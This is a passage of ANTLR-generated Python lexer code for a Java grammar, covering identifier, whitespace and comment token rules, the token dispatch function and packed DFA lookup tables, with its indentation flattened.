self.match("assert")
#action start
if not self.assertIsKeyword:
    _type = Identifier
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "ASSERT"
# $ANTLR start "Identifier"
def mIdentifier(self, ):
try:
_type = Identifier
_channel = DEFAULT_CHANNEL
# ./Java.g:1538:5: ( Letter ( Letter | JavaIDDigit )* )
# ./Java.g:1538:9: Letter ( Letter | JavaIDDigit )*
pass
self.mLetter()
# ./Java.g:1538:16: ( Letter | JavaIDDigit )*
while True: #loop25
alt25 = 2
LA25_0 = self.input.LA(1)
if (LA25_0 == 36 or (48 <= LA25_0 <= 57) or (65 <= LA25_0 <= 90) or LA25_0 == 95 or (97 <= LA25_0 <= 122) or (192 <= LA25_0 <= 214) or (216 <= LA25_0 <= 246) or (248 <= LA25_0 <= 8191) or (12352 <= LA25_0 <= 12687) or (13056 <= LA25_0 <= 13183) or (13312 <= LA25_0 <= 15661) or (19968 <= LA25_0 <= 40959) or (63744 <= LA25_0 <= 64255)) :
alt25 = 1
if alt25 == 1:
# ./Java.g:
pass
if self.input.LA(1) == 36 or (48 <= self.input.LA(1) <= 57) or (65 <= self.input.LA(1) <= 90) or self.input.LA(1) == 95 or (97 <= self.input.LA(1) <= 122) or (192 <= self.input.LA(1) <= 214) or (216 <= self.input.LA(1) <= 246) or (248 <= self.input.LA(1) <= 8191) or (12352 <= self.input.LA(1) <= 12687) or (13056 <= self.input.LA(1) <= 13183) or (13312 <= self.input.LA(1) <= 15661) or (19968 <= self.input.LA(1) <= 40959) or (63744 <= self.input.LA(1) <= 64255):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
else:
break #loop25
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "Identifier"
# $ANTLR start "Letter"
def mLetter(self, ):
try:
# ./Java.g:1546:5: ( '\\u0024' | '\\u0041' .. '\\u005a' | '\\u005f' | '\\u0061' .. '\\u007a' | '\\u00c0' .. '\\u00d6' | '\\u00d8' .. '\\u00f6' | '\\u00f8' .. '\\u00ff' | '\\u0100' .. '\\u1fff' | '\\u3040' .. '\\u318f' | '\\u3300' .. '\\u337f' | '\\u3400' .. '\\u3d2d' | '\\u4e00' .. '\\u9fff' | '\\uf900' .. '\\ufaff' )
# ./Java.g:
pass
if self.input.LA(1) == 36 or (65 <= self.input.LA(1) <= 90) or self.input.LA(1) == 95 or (97 <= self.input.LA(1) <= 122) or (192 <= self.input.LA(1) <= 214) or (216 <= self.input.LA(1) <= 246) or (248 <= self.input.LA(1) <= 8191) or (12352 <= self.input.LA(1) <= 12687) or (13056 <= self.input.LA(1) <= 13183) or (13312 <= self.input.LA(1) <= 15661) or (19968 <= self.input.LA(1) <= 40959) or (63744 <= self.input.LA(1) <= 64255):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "Letter"
# $ANTLR start "JavaIDDigit"
def mJavaIDDigit(self, ):
try:
# ./Java.g:1563:5: ( '\\u0030' .. '\\u0039' | '\\u0660' .. '\\u0669' | '\\u06f0' .. '\\u06f9' | '\\u0966' .. '\\u096f' | '\\u09e6' .. '\\u09ef' | '\\u0a66' .. '\\u0a6f' | '\\u0ae6' .. '\\u0aef' | '\\u0b66' .. '\\u0b6f' | '\\u0be7' .. '\\u0bef' | '\\u0c66' .. '\\u0c6f' | '\\u0ce6' .. '\\u0cef' | '\\u0d66' .. '\\u0d6f' | '\\u0e50' .. '\\u0e59' | '\\u0ed0' .. '\\u0ed9' | '\\u1040' .. '\\u1049' )
# ./Java.g:
pass
if (48 <= self.input.LA(1) <= 57) or (1632 <= self.input.LA(1) <= 1641) or (1776 <= self.input.LA(1) <= 1785) or (2406 <= self.input.LA(1) <= 2415) or (2534 <= self.input.LA(1) <= 2543) or (2662 <= self.input.LA(1) <= 2671) or (2790 <= self.input.LA(1) <= 2799) or (2918 <= self.input.LA(1) <= 2927) or (3047 <= self.input.LA(1) <= 3055) or (3174 <= self.input.LA(1) <= 3183) or (3302 <= self.input.LA(1) <= 3311) or (3430 <= self.input.LA(1) <= 3439) or (3664 <= self.input.LA(1) <= 3673) or (3792 <= self.input.LA(1) <= 3801) or (4160 <= self.input.LA(1) <= 4169):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "JavaIDDigit"
# $ANTLR start "WS"
def mWS(self, ):
try:
_type = WS
_channel = DEFAULT_CHANNEL
# ./Java.g:1580:5: ( ( ' ' | '\\r' | '\\t' | '\\u000C' | '\\n' ) )
# ./Java.g:1580:8: ( ' ' | '\\r' | '\\t' | '\\u000C' | '\\n' )
pass
if (9 <= self.input.LA(1) <= 10) or (12 <= self.input.LA(1) <= 13) or self.input.LA(1) == 32:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
#action start
_channel = HIDDEN
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "WS"
# $ANTLR start "COMMENT"
def mCOMMENT(self, ):
try:
_type = COMMENT
_channel = DEFAULT_CHANNEL
# ./Java.g:1584:5: ( '/*' ( options {greedy=false; } : . )* '*/' )
# ./Java.g:1584:9: '/*' ( options {greedy=false; } : . )* '*/'
pass
self.match("/*")
# ./Java.g:1584:14: ( options {greedy=false; } : . )*
while True: #loop26
alt26 = 2
LA26_0 = self.input.LA(1)
if (LA26_0 == 42) :
LA26_1 = self.input.LA(2)
if (LA26_1 == 47) :
alt26 = 2
elif ((0 <= LA26_1 <= 46) or (48 <= LA26_1 <= 65534)) :
alt26 = 1
elif ((0 <= LA26_0 <= 41) or (43 <= LA26_0 <= 65534)) :
alt26 = 1
if alt26 == 1:
# ./Java.g:1584:41: .
pass
self.matchAny()
else:
break #loop26
self.match("*/")
#action start
_channel = HIDDEN
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "COMMENT"
# $ANTLR start "LINE_COMMENT"
def mLINE_COMMENT(self, ):
try:
_type = LINE_COMMENT
_channel = DEFAULT_CHANNEL
# ./Java.g:1588:5: ( '//' (~ ( '\\n' | '\\r' ) )* ( '\\r' )? '\\n' )
# ./Java.g:1588:7: '//' (~ ( '\\n' | '\\r' ) )* ( '\\r' )? '\\n'
pass
self.match("//")
# ./Java.g:1588:12: (~ ( '\\n' | '\\r' ) )*
while True: #loop27
alt27 = 2
LA27_0 = self.input.LA(1)
if ((0 <= LA27_0 <= 9) or (11 <= LA27_0 <= 12) or (14 <= LA27_0 <= 65534)) :
alt27 = 1
if alt27 == 1:
# ./Java.g:1588:12: ~ ( '\\n' | '\\r' )
pass
if (0 <= self.input.LA(1) <= 9) or (11 <= self.input.LA(1) <= 12) or (14 <= self.input.LA(1) <= 65534):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
else:
break #loop27
# ./Java.g:1588:26: ( '\\r' )?
alt28 = 2
LA28_0 = self.input.LA(1)
if (LA28_0 == 13) :
alt28 = 1
if alt28 == 1:
# ./Java.g:1588:26: '\\r'
pass
self.match(13)
self.match(10)
#action start
_channel = HIDDEN
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "LINE_COMMENT"
def mTokens(self):
# ./Java.g:1:8: ( T__114 | T__115 | T__116 | T__117 | T__118 | T__119 | T__120 | T__121 | T__122 | T__123 | T__124 | T__125 | T__126 | T__127 | T__128 | T__129 | T__130 | T__131 | T__132 | T__133 | T__134 | T__135 | T__136 | T__137 | T__138 | T__139 | T__140 | T__141 | T__142 | T__143 | T__144 | T__145 | T__146 | T__147 | T__148 | T__149 | T__150 | T__151 | T__152 | T__153 | T__154 | T__155 | T__156 | T__157 | T__158 | T__159 | T__160 | T__161 | T__162 | T__163 | T__164 | T__165 | T__166 | T__167 | T__168 | T__169 | T__170 | T__171 | T__172 | T__173 | T__174 | T__175 | T__176 | T__177 | T__178 | T__179 | T__180 | T__181 | T__182 | T__183 | T__184 | T__185 | T__186 | T__187 | T__188 | T__189 | T__190 | T__191 | T__192 | T__193 | T__194 | T__195 | T__196 | T__197 | T__198 | T__199 | T__200 | T__201 | T__202 | HexLiteral | DecimalLiteral | OctalLiteral | FloatingPointLiteral | CharacterLiteral | StringLiteral | ENUM | ASSERT | Identifier | WS | COMMENT | LINE_COMMENT )
alt29 = 101
alt29 = self.dfa29.predict(self.input)
if alt29 == 1:
# ./Java.g:1:10: T__114
pass
self.mT__114()
elif alt29 == 2:
# ./Java.g:1:17: T__115
pass
self.mT__115()
elif alt29 == 3:
# ./Java.g:1:24: T__116
pass
self.mT__116()
elif alt29 == 4:
# ./Java.g:1:31: T__117
pass
self.mT__117()
elif alt29 == 5:
# ./Java.g:1:38: T__118
pass
self.mT__118()
elif alt29 == 6:
# ./Java.g:1:45: T__119
pass
self.mT__119()
elif alt29 == 7:
# ./Java.g:1:52: T__120
pass
self.mT__120()
elif alt29 == 8:
# ./Java.g:1:59: T__121
pass
self.mT__121()
elif alt29 == 9:
# ./Java.g:1:66: T__122
pass
self.mT__122()
elif alt29 == 10:
# ./Java.g:1:73: T__123
pass
self.mT__123()
elif alt29 == 11:
# ./Java.g:1:80: T__124
pass
self.mT__124()
elif alt29 == 12:
# ./Java.g:1:87: T__125
pass
self.mT__125()
elif alt29 == 13:
# ./Java.g:1:94: T__126
pass
self.mT__126()
elif alt29 == 14:
# ./Java.g:1:101: T__127
pass
self.mT__127()
elif alt29 == 15:
# ./Java.g:1:108: T__128
pass
self.mT__128()
elif alt29 == 16:
# ./Java.g:1:115: T__129
pass
self.mT__129()
elif alt29 == 17:
# ./Java.g:1:122: T__130
pass
self.mT__130()
elif alt29 == 18:
# ./Java.g:1:129: T__131
pass
self.mT__131()
elif alt29 == 19:
# ./Java.g:1:136: T__132
pass
self.mT__132()
elif alt29 == 20:
# ./Java.g:1:143: T__133
pass
self.mT__133()
elif alt29 == 21:
# ./Java.g:1:150: T__134
pass
self.mT__134()
elif alt29 == 22:
# ./Java.g:1:157: T__135
pass
self.mT__135()
elif alt29 == 23:
# ./Java.g:1:164: T__136
pass
self.mT__136()
elif alt29 == 24:
# ./Java.g:1:171: T__137
pass
self.mT__137()
elif alt29 == 25:
# ./Java.g:1:178: T__138
pass
self.mT__138()
elif alt29 == 26:
# ./Java.g:1:185: T__139
pass
self.mT__139()
elif alt29 == 27:
# ./Java.g:1:192: T__140
pass
self.mT__140()
elif alt29 == 28:
# ./Java.g:1:199: T__141
pass
self.mT__141()
elif alt29 == 29:
# ./Java.g:1:206: T__142
pass
self.mT__142()
elif alt29 == 30:
# ./Java.g:1:213: T__143
pass
self.mT__143()
elif alt29 == 31:
# ./Java.g:1:220: T__144
pass
self.mT__144()
elif alt29 == 32:
# ./Java.g:1:227: T__145
pass
self.mT__145()
elif alt29 == 33:
# ./Java.g:1:234: T__146
pass
self.mT__146()
elif alt29 == 34:
# ./Java.g:1:241: T__147
pass
self.mT__147()
elif alt29 == 35:
# ./Java.g:1:248: T__148
pass
self.mT__148()
elif alt29 == 36:
# ./Java.g:1:255: T__149
pass
self.mT__149()
elif alt29 == 37:
# ./Java.g:1:262: T__150
pass
self.mT__150()
elif alt29 == 38:
# ./Java.g:1:269: T__151
pass
self.mT__151()
elif alt29 == 39:
# ./Java.g:1:276: T__152
pass
self.mT__152()
elif alt29 == 40:
# ./Java.g:1:283: T__153
pass
self.mT__153()
elif alt29 == 41:
# ./Java.g:1:290: T__154
pass
self.mT__154()
elif alt29 == 42:
# ./Java.g:1:297: T__155
pass
self.mT__155()
elif alt29 == 43:
# ./Java.g:1:304: T__156
pass
self.mT__156()
elif alt29 == 44:
# ./Java.g:1:311: T__157
pass
self.mT__157()
elif alt29 == 45:
# ./Java.g:1:318: T__158
pass
self.mT__158()
elif alt29 == 46:
# ./Java.g:1:325: T__159
pass
self.mT__159()
elif alt29 == 47:
# ./Java.g:1:332: T__160
pass
self.mT__160()
elif alt29 == 48:
# ./Java.g:1:339: T__161
pass
self.mT__161()
elif alt29 == 49:
# ./Java.g:1:346: T__162
pass
self.mT__162()
elif alt29 == 50:
# ./Java.g:1:353: T__163
pass
self.mT__163()
elif alt29 == 51:
# ./Java.g:1:360: T__164
pass
self.mT__164()
elif alt29 == 52:
# ./Java.g:1:367: T__165
pass
self.mT__165()
elif alt29 == 53:
# ./Java.g:1:374: T__166
pass
self.mT__166()
elif alt29 == 54:
# ./Java.g:1:381: T__167
pass
self.mT__167()
elif alt29 == 55:
# ./Java.g:1:388: T__168
pass
self.mT__168()
elif alt29 == 56:
# ./Java.g:1:395: T__169
pass
self.mT__169()
elif alt29 == 57:
# ./Java.g:1:402: T__170
pass
self.mT__170()
elif alt29 == 58:
# ./Java.g:1:409: T__171
pass
self.mT__171()
elif alt29 == 59:
# ./Java.g:1:416: T__172
pass
self.mT__172()
elif alt29 == 60:
# ./Java.g:1:423: T__173
pass
self.mT__173()
elif alt29 == 61:
# ./Java.g:1:430: T__174
pass
self.mT__174()
elif alt29 == 62:
# ./Java.g:1:437: T__175
pass
self.mT__175()
elif alt29 == 63:
# ./Java.g:1:444: T__176
pass
self.mT__176()
elif alt29 == 64:
# ./Java.g:1:451: T__177
pass
self.mT__177()
elif alt29 == 65:
# ./Java.g:1:458: T__178
pass
self.mT__178()
elif alt29 == 66:
# ./Java.g:1:465: T__179
pass
self.mT__179()
elif alt29 == 67:
# ./Java.g:1:472: T__180
pass
self.mT__180()
elif alt29 == 68:
# ./Java.g:1:479: T__181
pass
self.mT__181()
elif alt29 == 69:
# ./Java.g:1:486: T__182
pass
self.mT__182()
elif alt29 == 70:
# ./Java.g:1:493: T__183
pass
self.mT__183()
elif alt29 == 71:
# ./Java.g:1:500: T__184
pass
self.mT__184()
elif alt29 == 72:
# ./Java.g:1:507: T__185
pass
self.mT__185()
elif alt29 == 73:
# ./Java.g:1:514: T__186
pass
self.mT__186()
elif alt29 == 74:
# ./Java.g:1:521: T__187
pass
self.mT__187()
elif alt29 == 75:
# ./Java.g:1:528: T__188
pass
self.mT__188()
elif alt29 == 76:
# ./Java.g:1:535: T__189
pass
self.mT__189()
elif alt29 == 77:
# ./Java.g:1:542: T__190
pass
self.mT__190()
elif alt29 == 78:
# ./Java.g:1:549: T__191
pass
self.mT__191()
elif alt29 == 79:
# ./Java.g:1:556: T__192
pass
self.mT__192()
elif alt29 == 80:
# ./Java.g:1:563: T__193
pass
self.mT__193()
elif alt29 == 81:
# ./Java.g:1:570: T__194
pass
self.mT__194()
elif alt29 == 82:
# ./Java.g:1:577: T__195
pass
self.mT__195()
elif alt29 == 83:
# ./Java.g:1:584: T__196
pass
self.mT__196()
elif alt29 == 84:
# ./Java.g:1:591: T__197
pass
self.mT__197()
elif alt29 == 85:
# ./Java.g:1:598: T__198
pass
self.mT__198()
elif alt29 == 86:
# ./Java.g:1:605: T__199
pass
self.mT__199()
elif alt29 == 87:
# ./Java.g:1:612: T__200
pass
self.mT__200()
elif alt29 == 88:
# ./Java.g:1:619: T__201
pass
self.mT__201()
elif alt29 == 89:
# ./Java.g:1:626: T__202
pass
self.mT__202()
elif alt29 == 90:
# ./Java.g:1:633: HexLiteral
pass
self.mHexLiteral()
elif alt29 == 91:
# ./Java.g:1:644: DecimalLiteral
pass
self.mDecimalLiteral()
elif alt29 == 92:
# ./Java.g:1:659: OctalLiteral
pass
self.mOctalLiteral()
elif alt29 == 93:
# ./Java.g:1:672: FloatingPointLiteral
pass
self.mFloatingPointLiteral()
elif alt29 == 94:
# ./Java.g:1:693: CharacterLiteral
pass
self.mCharacterLiteral()
elif alt29 == 95:
# ./Java.g:1:710: StringLiteral
pass
self.mStringLiteral()
elif alt29 == 96:
# ./Java.g:1:724: ENUM
pass
self.mENUM()
elif alt29 == 97:
# ./Java.g:1:729: ASSERT
pass
self.mASSERT()
elif alt29 == 98:
# ./Java.g:1:736: Identifier
pass
self.mIdentifier()
elif alt29 == 99:
# ./Java.g:1:747: WS
pass
self.mWS()
elif alt29 == 100:
# ./Java.g:1:750: COMMENT
pass
self.mCOMMENT()
elif alt29 == 101:
# ./Java.g:1:758: LINE_COMMENT
pass
self.mLINE_COMMENT()
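# The DFA lookup tables below (eot, eof, min, max, accept, special,
# transition) are packed as escaped unicode strings and expanded by
# DFA.unpack; DFA #18 resolves the FloatingPointLiteral alternatives and
# DFA #29 drives the top-level mTokens dispatch.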
# lookup tables for DFA #18
DFA18_eot = DFA.unpack(
u"\6\uffff"
)
DFA18_eof = DFA.unpack(
u"\6\uffff"
)
DFA18_min = DFA.unpack(
u"\2\56\4\uffff"
)
DFA18_max = DFA.unpack(
u"\1\71\1\146\4\uffff"
)
DFA18_accept = DFA.unpack(
u"\2\uffff\1\2\1\4\1\3\1\1"
)
DFA18_special = DFA.unpack(
u"\6\uffff"
)
DFA18_transition = [
DFA.unpack(u"\1\2\1\uffff\12\1"),
DFA.unpack(u"\1\5\1\uffff\12\1\12\uffff\1\3\1\4\1\3\35\uffff\1\3"
u"\1\4\1\3"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #18
DFA18 = DFA
# lookup tables for DFA #29
DFA29_eot = DFA.unpack(
u"\1\uffff\1\55\1\uffff\2\55\1\73\1\76\2\55\3\uffff\1\110\2\uffff"
u"\1\55\2\uffff\1\55\1\115\4\55\3\uffff\1\55\2\uffff\2\55\1\137\1"
u"\142\1\146\1\151\1\153\1\155\1\157\1\uffff\1\55\2\164\4\uffff\5"
u"\55\1\175\5\55\5\uffff\7\55\3\uffff\3\55\2\uffff\10\55\1\u009c"
u"\6\55\23\uffff\2\55\1\uffff\1\u00a5\1\uffff\1\164\5\55\1\u00ad"
u"\1\55\1\uffff\23\55\1\u00c2\7\55\1\u00ca\2\55\1\uffff\2\55\1\u00cf"
u"\5\55\1\uffff\7\55\1\uffff\10\55\1\u00e4\1\55\1\u00e6\2\55\1\u00e9"
u"\1\u00ea\1\u00eb\2\55\1\u00ee\1\u00ef\1\uffff\2\55\1\u00f2\1\55"
u"\1\u00f4\2\55\1\uffff\3\55\1\u00fa\1\uffff\17\55\1\u010a\1\u010b"
u"\2\55\1\u010e\1\uffff\1\u010f\1\uffff\2\55\3\uffff\1\55\1\u0114"
u"\2\uffff\2\55\1\uffff\1\u0117\1\uffff\1\u0118\1\u0119\1\u011b\2"
u"\55\1\uffff\1\55\1\u011f\4\55\1\u0124\2\55\1\u0127\3\55\1\u012b"
u"\1\55\2\uffff\1\u012d\1\55\2\uffff\3\55\1\u0132\1\uffff\2\55\3"
u"\uffff\1\55\1\uffff\1\u0136\1\55\1\u0138\1\uffff\1\u0139\1\55\1"
u"\u013b\1\u013c\1\uffff\1\55\1\u013e\1\uffff\3\55\1\uffff\1\55\1"
u"\uffff\2\55\1\u0145\1\55\1\uffff\1\55\1\u0148\1\u0149\1\uffff\1"
u"\u014a\2\uffff\1\55\2\uffff\1\55\1\uffff\3\55\1\u0150\1\55\1\u0152"
u"\1\uffff\1\u0153\1\55\3\uffff\1\u0155\1\u0156\1\55\1\u0158\1\55"
u"\1\uffff\1\55\2\uffff\1\u015b\2\uffff\1\u015c\1\uffff\1\u015d\1"
u"\55\3\uffff\1\55\1\u0160\1\uffff"
)
DFA29_eof = DFA.unpack(
u"\u0161\uffff"
)
DFA29_min = DFA.unpack(
u"\1\11\1\141\1\uffff\1\146\1\150\1\56\1\75\1\141\1\154\3\uffff\1"
u"\46\2\uffff\1\157\2\uffff\1\150\1\75\2\157\1\141\1\145\3\uffff"
u"\1\141\2\uffff\1\150\1\145\1\53\1\55\1\52\4\75\1\uffff\1\142\2"
u"\56\4\uffff\1\143\1\142\1\151\1\160\1\163\1\44\1\141\1\157\1\160"
u"\1\151\1\156\5\uffff\2\141\1\163\1\156\1\164\1\163\1\165\3\uffff"
u"\2\151\1\141\2\uffff\1\157\1\164\1\145\1\156\1\157\1\154\1\162"
u"\1\156\1\44\1\146\1\154\1\167\1\164\1\151\1\164\23\uffff\2\163"
u"\1\uffff\1\56\1\uffff\1\56\1\153\1\154\1\164\1\166\1\154\1\44\1"
u"\164\1\uffff\1\164\1\151\1\162\1\145\1\164\1\143\1\163\1\162\1"
u"\143\1\145\1\164\2\145\1\155\1\144\1\141\1\157\1\163\1\145\1\44"
u"\1\156\1\154\1\145\1\141\1\147\1\141\1\163\1\44\1\141\1\142\1\uffff"
u"\1\141\1\154\1\44\1\151\1\154\1\165\1\164\1\145\1\uffff\1\141\1"
u"\151\1\145\1\141\1\162\1\145\1\162\1\uffff\1\141\1\151\1\143\1"
u"\164\1\162\1\143\1\150\1\163\1\44\1\150\1\44\1\151\1\156\3\44\1"
u"\164\1\167\2\44\1\uffff\1\163\1\145\1\44\1\153\1\44\1\164\1\145"
u"\1\uffff\2\154\1\165\1\44\1\uffff\1\166\1\145\3\162\1\147\2\143"
u"\2\164\1\155\1\146\1\156\1\143\1\164\2\44\1\150\1\162\1\44\1\uffff"
u"\1\44\1\uffff\1\156\1\144\3\uffff\1\151\1\44\2\uffff\1\151\1\141"
u"\1\uffff\1\44\1\uffff\3\44\1\145\1\154\1\uffff\1\145\1\44\1\156"
u"\1\141\1\164\1\145\1\44\1\164\1\145\1\44\1\145\1\141\1\143\1\44"
u"\1\146\2\uffff\1\44\1\157\2\uffff\1\165\1\163\1\154\1\44\1\uffff"
u"\1\145\1\156\3\uffff\1\171\1\uffff\1\44\1\164\1\44\1\uffff\1\44"
u"\1\143\2\44\1\uffff\1\145\1\44\1\uffff\1\156\1\143\1\145\1\uffff"
u"\1\160\1\uffff\1\156\1\145\1\44\1\145\1\uffff\1\156\2\44\1\uffff"
u"\1\44\2\uffff\1\164\2\uffff\1\144\1\uffff\1\164\1\145\1\157\1\44"
u"\1\151\1\44\1\uffff\1\44\1\164\3\uffff\2\44\1\163\1\44\1\146\1"
u"\uffff\1\172\2\uffff\1\44\2\uffff\1\44\1\uffff\1\44\1\145\3\uffff"
u"\1\144\1\44\1\uffff"
)
DFA29_max = DFA.unpack(
u"\1\ufaff\1\165\1\uffff\1\156\1\171\1\71\1\75\1\157\1\170\3\uffff"
u"\1\75\2\uffff\1\157\2\uffff\1\162\1\75\1\171\3\157\3\uffff\1\165"
u"\2\uffff\1\150\1\145\3\75\1\174\3\75\1\uffff\1\163\1\170\1\146"
u"\4\uffff\1\143\1\142\1\157\1\160\1\164\1\ufaff\1\162\1\157\1\160"
u"\1\151\1\156\5\uffff\2\141\1\164\1\156\1\164\1\163\1\165\3\uffff"
u"\1\154\1\162\1\171\2\uffff\1\157\1\164\1\145\1\156\1\157\1\154"
u"\1\162\1\156\1\ufaff\1\146\1\154\1\167\1\164\1\151\1\164\23\uffff"
u"\2\163\1\uffff\1\146\1\uffff\1\146\1\153\1\154\1\164\1\166\1\157"
u"\1\ufaff\1\164\1\uffff\1\164\1\151\1\162\1\145\1\164\1\143\1\163"
u"\1\162\1\143\1\145\1\164\2\145\1\155\1\144\1\141\1\157\1\163\1"
u"\145\1\ufaff\1\156\1\154\1\145\1\141\1\147\1\141\1\163\1\ufaff"
u"\1\141\1\142\1\uffff\1\141\1\154\1\ufaff\1\151\1\154\1\165\1\164"
u"\1\145\1\uffff\1\141\1\151\1\145\1\141\1\162\1\145\1\162\1\uffff"
u"\1\141\1\151\1\143\1\164\1\162\1\143\1\150\1\163\1\ufaff\1\150"
u"\1\ufaff\1\151\1\156\3\ufaff\1\164\1\167\2\ufaff\1\uffff\1\163"
u"\1\145\1\ufaff\1\153\1\ufaff\1\164\1\145\1\uffff\2\154\1\165\1"
u"\ufaff\1\uffff\1\166\1\145\3\162\1\147\2\143\2\164\1\155\1\146"
u"\1\156\1\143\1\164\2\ufaff\1\150\1\162\1\ufaff\1\uffff\1\ufaff"
u"\1\uffff\1\156\1\144\3\uffff\1\151\1\ufaff\2\uffff\1\151\1\141"
u"\1\uffff\1\ufaff\1\uffff\3\ufaff\1\145\1\154\1\uffff\1\145\1\ufaff"
u"\1\156\1\141\1\164\1\145\1\ufaff\1\164\1\145\1\ufaff\1\145\1\141"
u"\1\143\1\ufaff\1\146\2\uffff\1\ufaff\1\157\2\uffff\1\165\1\163"
u"\1\154\1\ufaff\1\uffff\1\145\1\156\3\uffff\1\171\1\uffff\1\ufaff"
u"\1\164\1\ufaff\1\uffff\1\ufaff\1\143\2\ufaff\1\uffff\1\145\1\ufaff"
u"\1\uffff\1\156\1\143\1\145\1\uffff\1\160\1\uffff\1\156\1\145\1"
u"\ufaff\1\145\1\uffff\1\156\2\ufaff\1\uffff\1\ufaff\2\uffff\1\164"
u"\2\uffff\1\144\1\uffff\1\164\1\145\1\157\1\ufaff\1\151\1\ufaff"
u"\1\uffff\1\ufaff\1\164\3\uffff\2\ufaff\1\163\1\ufaff\1\146\1\uffff"
u"\1\172\2\uffff\1\ufaff\2\uffff\1\ufaff\1\uffff\1\ufaff\1\145\3"
u"\uffff\1\144\1\ufaff\1\uffff"
)
DFA29_accept = DFA.unpack(
u"\2\uffff\1\2\6\uffff\1\12\1\13\1\14\1\uffff\1\16\1\17\1\uffff\1"
u"\22\1\23\6\uffff\1\36\1\40\1\41\1\uffff\1\47\1\51\11\uffff\1\116"
u"\3\uffff\1\136\1\137\1\142\1\143\13\uffff\1\42\1\5\1\135\1\73\1"
u"\6\7\uffff\1\75\1\102\1\15\3\uffff\1\105\1\25\17\uffff\1\71\1\114"
u"\1\110\1\72\1\115\1\111\1\74\1\144\1\145\1\112\1\76\1\101\1\103"
u"\1\77\1\104\1\100\1\113\1\106\1\117\2\uffff\1\132\1\uffff\1\133"
u"\10\uffff\1\52\36\uffff\1\56\10\uffff\1\134\7\uffff\1\32\24\uffff"
u"\1\57\7\uffff\1\54\4\uffff\1\120\24\uffff\1\27\1\uffff\1\70\2\uffff"
u"\1\53\1\140\1\21\2\uffff\1\43\1\44\2\uffff\1\30\1\uffff\1\33\5"
u"\uffff\1\46\17\uffff\1\31\1\37\2\uffff\1\7\1\60\4\uffff\1\65\2"
u"\uffff\1\66\1\34\1\45\1\uffff\1\125\3\uffff\1\55\4\uffff\1\121"
u"\2\uffff\1\3\3\uffff\1\4\1\uffff\1\62\4\uffff\1\24\3\uffff\1\35"
u"\1\uffff\1\126\1\64\1\uffff\1\141\1\1\1\uffff\1\123\6\uffff\1\10"
u"\2\uffff\1\26\1\61\1\50\5\uffff\1\131\1\uffff\1\67\1\130\1\uffff"
u"\1\124\1\122\1\uffff\1\20\2\uffff\1\127\1\11\1\107\2\uffff\1\63"
)
DFA29_special = DFA.unpack(
u"\u0161\uffff"
)
DFA29_transition = [
DFA.unpack(u"\2\56\1\uffff\2\56\22\uffff\1\56\1\46\1\54\1\uffff\1"
u"\55\1\45\1\14\1\53\1\31\1\32\1\6\1\40\1\12\1\41\1\5\1\42\1\51\11"
u"\52\1\35\1\2\1\11\1\23\1\13\1\30\1\34\32\55\1\20\1\uffff\1\21\1"
u"\44\1\55\1\uffff\1\50\1\24\1\7\1\27\1\10\1\26\2\55\1\3\2\55\1\25"
u"\1\55\1\33\1\55\1\1\1\55\1\37\1\4\1\22\1\55\1\17\1\36\3\55\1\15"
u"\1\43\1\16\1\47\101\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55"
u"\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55"
u"\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\57\20\uffff\1\61\2\uffff\1\60"),
DFA.unpack(u""),
DFA.unpack(u"\1\64\6\uffff\1\62\1\63"),
DFA.unpack(u"\1\66\13\uffff\1\65\1\67\1\uffff\1\70\1\uffff\1\71"),
DFA.unpack(u"\1\72\1\uffff\12\74"),
DFA.unpack(u"\1\75"),
DFA.unpack(u"\1\101\6\uffff\1\100\3\uffff\1\77\2\uffff\1\102"),
DFA.unpack(u"\1\104\1\uffff\1\105\11\uffff\1\103"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\107\26\uffff\1\106"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\111"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\112\11\uffff\1\113"),
DFA.unpack(u"\1\114"),
DFA.unpack(u"\1\116\2\uffff\1\120\6\uffff\1\117"),
DFA.unpack(u"\1\121"),
DFA.unpack(u"\1\123\7\uffff\1\125\2\uffff\1\122\2\uffff\1\124"),
DFA.unpack(u"\1\127\11\uffff\1\126"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\132\3\uffff\1\131\17\uffff\1\130"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\133"),
DFA.unpack(u"\1\134"),
DFA.unpack(u"\1\136\21\uffff\1\135"),
DFA.unpack(u"\1\141\17\uffff\1\140"),
DFA.unpack(u"\1\144\4\uffff\1\145\15\uffff\1\143"),
DFA.unpack(u"\1\147\76\uffff\1\150"),
DFA.unpack(u"\1\152"),
DFA.unpack(u"\1\154"),
DFA.unpack(u"\1\156"),
DFA.unpack(u""),
DFA.unpack(u"\1\160\20\uffff\1\161"),
DFA.unpack(u"\1\74\1\uffff\10\163\2\74\12\uffff\3\74\21\uffff\1"
u"\162\13\uffff\3\74\21\uffff\1\162"),
DFA.unpack(u"\1\74\1\uffff\12\165\12\uffff\3\74\35\uffff\3\74"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\166"),
DFA.unpack(u"\1\167"),
DFA.unpack(u"\1\171\5\uffff\1\170"),
DFA.unpack(u"\1\172"),
DFA.unpack(u"\1\174\1\173"),
